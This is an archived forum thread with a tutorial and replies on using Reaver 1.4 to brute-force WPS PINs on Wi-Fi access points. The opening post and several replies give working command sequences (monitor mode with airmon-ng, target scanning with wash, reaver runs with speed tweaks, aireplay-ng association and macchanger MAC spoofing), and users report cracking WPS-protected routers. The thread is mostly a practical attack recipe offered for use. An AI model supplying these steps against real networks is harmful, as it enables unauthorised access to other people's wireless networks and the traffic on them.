PDA

View Full Version : Reaver 1.4 WPS Bruteforce Tool Install/Scan/Bruteforce Tutorial



MartinBishop
01-21-2012, 05:06 AM
http://maurisdump.blogspot.com/2012/01/reaver-14-wps-bruteforcing-tool-upgrade.html

Prerequisites

You must be running Linux
You must have a wireless card capable of raw injection
You must put your wireless card into monitor mode. This is most easily done using airmon-ng from the aircrack-ng tool suite.

Basic Usage

First, make sure your wireless card is in monitor mode:

# airmon-ng start wlan0

Then Start ./wash -i mon0 to scan for valid Wifis.

To run Reaver, you must specify the BSSID of the target AP and the name of the monitor mode interface (usually 'mon0', not 'wlan0', although this will vary based on your wireless card/drivers):

# reaver -i mon0 -b 00:01:02:03:04:05

You will probably also want to use -vv to get verbose info about Reaver's progress:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv

Speeding Up the Attack

By default, Reaver has a 1 second delay between pin attempts. You can disable this delay by adding '-d 0' on the command line, but some APs may not like it:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0

robbo1985
02-02-2012, 01:02 PM
used this tool before i was lucky and it cracked my wps in 2 hours only got to around 10% to 15% before it cracked it most computers im guessing it will take around 6 - 12 hours to crack the wps

tool worth adding

TAPE
02-04-2012, 05:32 AM
I was having good results with v1.3, however was having difficulty with v1.4;
it was not associating with my test router whereas v1.3 was associating fine.

My work around was associating with aireplay-ng and running reaver with the -A switch ;

So in 1 terminal window ;


aireplay-ng mon0 -1 120 -b 00:11:22:33:55 -e ESSID

In another terminal window ;


reaver -i mon0 -A -c XX -b 00:11:22:33:44:55 -v


Am still running through it, however sofar so good.

VulpiArgenti
02-04-2012, 08:19 AM
Genius TAPE - this is the first time I've managed to get Reaver working.
.
(Small typo in the first code line: "-b" should be "-a" I think).

zimmaro
02-04-2012, 10:08 AM
from the (bottom) of my experience I think that version 1.3 works better than 1.4 (I run the same "SIMPLE-test" in the same "situation" with the two versions) passed tests only v1.3 :)
bye

TAPE
02-04-2012, 11:32 AM
Genius TAPE - this is the first time I've managed to get Reaver working.
.
(Small typo in the first code line: "-b" should be "-a" I think).


Yeah think you are right ;) I always get confused with which switch to use in aireplay ;)

I am currently running it like this on a VMware image of BT5R1 and so far so good ;
http://adaywithtape.blogspot.com/2012/01/cracking-wpa-using-wps-vulnerability.html

I will amend the blogpost later to have the -a switch correctly mentioned after testing complete ;)

TAPE
02-04-2012, 11:34 AM
Damn this double post syndrome...

VulpiArgenti
02-04-2012, 06:42 PM
Yes, I don't know what's going on with the forum software. I currently have no "go advanced" or formatting tools; my posts luk iliturat http://www.backtrack-linux.org/forums/images/smilies/frown.png

djolej
02-16-2012, 07:07 PM
from the (bottom) of my experience I think that version 1.3 works better than 1.4 (I run the same "SIMPLE-test" in the same "situation" with the two versions) passed tests only v1.3 :)
bye

i keep getting WARNING: Receive timeout occurred, and i cant get it to start? anyone knows how to fix this? i tried wash, and -d 15 :P has this anything to do with 1.4 version?

TheEnd
05-17-2012, 04:59 AM
http://i45.tinypic.com/20igfht.jpg

it's stuck on that for about half an hour, What seems to be the problem ?
Note: Same pin, and same percentage for half an hour...

Eatme
05-23-2012, 06:51 AM
*This worked for me

:~# airmon-ng stop wlan0/mon0
ifconfig wlan0 down
macchanger -a wlan0 > copy mac
airmon-ng start wlan0 11 < AP channel
ifconfig mon0 down
macchanger -m "paste same mac" mon0
ifconfig wlan0 up
ifconfig mon0 up

open new > TAB/Window/Terminal
aireplay-ng mon0 -1 120 -a BSSID -e ESSID > let it run

:~# reaver -i mon0 -A -b BSSID -v -d 1 -x 30 -l 600

-d 1 can be -d 0 (0 might be too fast, in case it is add -l 60 or 120)
-play around with -x 30 as well, i manage to get 5-20+ keys /seconds without any errors

*This worked for me

http://i.imgur.com/eWDfB.jpg

dombera
05-24-2012, 07:20 AM
Hi Eatme! Thans for the info!
I was wondering if you could post your conkyrc file as I like your config a lot? ;)

Eatme
05-24-2012, 10:32 AM
Hi Eatme! Thans for the info!
I was wondering if you could post your conkyrc file as I like your config a lot? ;)

hey, np!

and thanks :cool: , but I can't seem to find my conkyrc file... I'm guessing I don't have it installed.

Eatme
05-24-2012, 04:12 PM
im guessing the lower the (xx seconds/pin) are the faster its cracking or is it the higher they are..

I'm trying to test out some diff commands to make it crack the fastest without errors.. or trying the same pin

The highest I have it at is (10-20 seconds/pin)

longjidin
05-30-2012, 12:06 AM
i am using this method its take time between 2 or 10 hour depend on the PIN correct me if i am wrong.... :rolleyes:

viper606
06-13-2012, 12:18 PM
*This worked for me

:~# airmon-ng stop wlan0/mon0
ifconfig wlan0 down
macchanger -a wlan0 > copy mac
airmon-ng start wlan0 11 < AP channel
ifconfig mon0 down
macchanger -m "paste same mac" mon0
ifconfig wlan0 up
ifconfig mon0 up

open new > TAB/Window/Terminal
aireplay-ng mon0 -1 120 -a BSSID -e ESSID > let it run

:~# reaver -i mon0 -A -b BSSID -v -d 1 -x 30 -l 600

-d 1 can be -d 0 (0 might be too fast, in case it is add -l 60 or 120)
-play around with -x 30 as well, i manage to get 5-20+ keys /seconds without any errors

*This worked for me

http://i.imgur.com/eWDfB.jpg

What is meant by copy mac, mac wireless card or mac AP

viper606
06-13-2012, 12:25 PM
macchanger -a wlan0 > copy mac

what is meant by copy mac, is it mac wireless card or mac app

hannah
07-11-2012, 05:09 PM
I was having good results with v1.3, however was having difficulty with v1.4;
it was not associating with my test router whereas v1.3 was associating fine.

My work around was associating with aireplay-ng and running reaver with the -A switch ;

So in 1 terminal window ;


aireplay-ng mon0 -1 120 -b 00:11:22:33:55 -e ESSID

In another terminal window ;


reaver -i mon0 -A -c XX -b 00:11:22:33:44:55 -v


Am still running through it, however sofar so good.


Apologies for quoting this old comment.
What is the reason for running


aireplay-ng mon0 -1 120 -b 00:11:22:33:55 -e ESSID

simultaneously with reaver in another terminal please.

I have been able to crack many WPS enabled APs just with this command:


reaver -i mon0 -b BSSID -c 7 -x 60 -a -f -vv

Question1: What is the need to for the aireplay-ng command in another terminal?
Question2: Can you run reaver 1.4 and reaver 1.3 in the same BT installation please?

Kind regards always:)

TAPE
07-11-2012, 06:02 PM
1) The reason for me running the aireplay command was due to reaver not functioning as it should
on the installation I had at that time. Not sure what the error was that necessitated that, but it
was a work around that worked at the time.
With a later install on the later released BT5R2 it was no longer required for me.
It was a fix that was required only when reaver was not correctly associating on my setup, if it works
'out of the box' for you then no need to even consider it.

2) Actually, I dont think you can with the normal install procedures as one will overwrite the other..

hannah
07-11-2012, 06:16 PM
2) Actually, I dont think you can with the normal install procedures as one will overwrite the other..

Got that.. I am having a lot of issues lately with reaver 1.4..

In your opinion do you think reaver 1.3 is better, plz

TAPE
07-12-2012, 01:40 AM
I have to go with v1.4 runing on BT5R2.. when I last tested it it really blasted through my test router.